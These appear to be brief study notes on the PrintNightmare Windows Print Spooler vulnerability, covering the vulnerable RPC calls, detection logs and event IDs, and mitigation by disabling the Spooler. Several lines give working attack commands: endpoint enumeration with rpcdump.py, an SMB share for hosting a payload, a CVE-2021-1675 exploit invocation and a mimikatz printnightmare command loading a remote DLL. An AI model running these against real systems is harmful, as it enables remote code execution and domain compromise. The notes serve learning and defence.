C:\Windows\System32\spoolsv.exe
RpcAddPrinterDriver
or RpcAddPrinterDriverEx
rpcdump.py @$TARGET_IP | grep -e 'MS-RPRN|MS-PAR'
smbserver.py share . -smb2support
python CVE-2021-1675.py <domain of domaincontroller>/<user>:<password>@$TARGET_IP
misc::printnightmare /target:<domain.com> /authuser:<lowpriv_user> /authpassword:<password> /library:\\<domain.com>\path\to\printnightmare.dll
pcAddPrinterDriverEx()
is calledLogs are Microsoft-Windows-PrintService/Admin
and Microsoft-Windows-PrintService/Operational
316, 808, 811, 31017, 7031
Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled
Computer Configuration/Administrative Templates/Printers
Social_engineering